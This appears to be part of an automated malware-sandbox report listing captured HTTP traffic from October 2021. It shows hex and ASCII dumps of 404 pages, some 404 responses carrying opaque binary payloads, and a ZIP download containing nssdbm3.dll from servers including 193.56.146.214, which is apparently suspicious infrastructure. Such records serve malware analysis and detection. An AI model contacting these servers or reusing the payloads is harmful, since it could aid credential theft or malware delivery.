d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:12 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=93Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 33 62 39 32 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 7b c0 4d c5 0c cd ac 7a b7 be 4f 41 dd 46 29 0a e9 36 a7 19 bc 64 89 2e 7c 6f 3b 05 14 41 67 ef 3b f3 56 72 3e 8f 19 04 b2 10 12 87 d6 37 cb 3a fa 04 f1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 da 52 2e e6 2c 7e d7 ff bc a2 2e cb 81 88 4b 55 09 84 c1 1e 3b 50 6b bd ce d3 58 87 d6 41 c9 b0 26 0c 94 d0 99 7d 5a 99 0b 99 5b af 18 9f 7a bd ed 94 a6 32 3e 1a 20 8c 63 b3 ca 21 bf ad f5 31 61 a4 cf 37 1f 1a eb 3f 8c ff 74 3d 9f 8e f5 03 b6 0f cd 9a df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 96 ed 37 14 71 7e a2 55 6b 5f c7 ae 4a 88 54 d9 4e 5d 8e 7b db fe 88 2c 93 de fa 10 e5 cc 9a db 66 dc 31 5d 0e 88 9d 8f 93 f2 2f 81 5d 06 db 3a 35 b1 cf d5 69 4b 44 88 fe 40 0a 5c 69 ba e8 33 b4 b5 05 89 12 1e 0d 83 95 e8 b1 3e a5 64 3b df 39 ec 29 02 87 b2 e3 53 3d f4 c1 96 8b 4d 5c 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 0e 64 35 82 26 2a 62 ae 23 54 05 91 d5 4c 6a 05 23 5f cf 4a b0 60 79 0d 6a 73 e2 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 f2 d6 ea ac 3f 19 13 a3 0b ab c1 39 aa a7 66 94 c4 a6 d6 30 80 10 10 b2 9c cc c1 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff b3 53 5d 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 
bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b4 2c f4 47 1f 3f 4d 93 19 60 70 06 7d 52 89 52 8c 3e 09 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 
7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc df 85 6e bb f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 b9 71 cd f5 34 33 d1 62 73 45 7c 1f 57 44 f3 08 b9 3c 50 15 51 fe 08 22 b1 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 45 78 b1 17 20 58 4a ed 68 6a 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 5c 6d 52 db 93 0d 13 13 bf 1e e9 92 28 0e 4f c5 03 a1 cb a1 61 7e de f5 69 77 1e 17 c6 4c af 9a a5 64 c1 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 d3 fb 2d b9 72 ce cc 23 b2 b7 09 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 3f cf cc 46 d9 48 1d ac af e3 d9 55 3d 6b bd 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 aa 6c b1 1d 32 12 51 8c bc 10 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 46 9d 16 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 74 5d 01 f1 10 35 ae 03 58 e5 1f e4 ae 7d 10 99 80 e0 d9 b0 c1 1c 9e 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 
7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:17 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=92Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:19 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:19 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 12:11:15 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 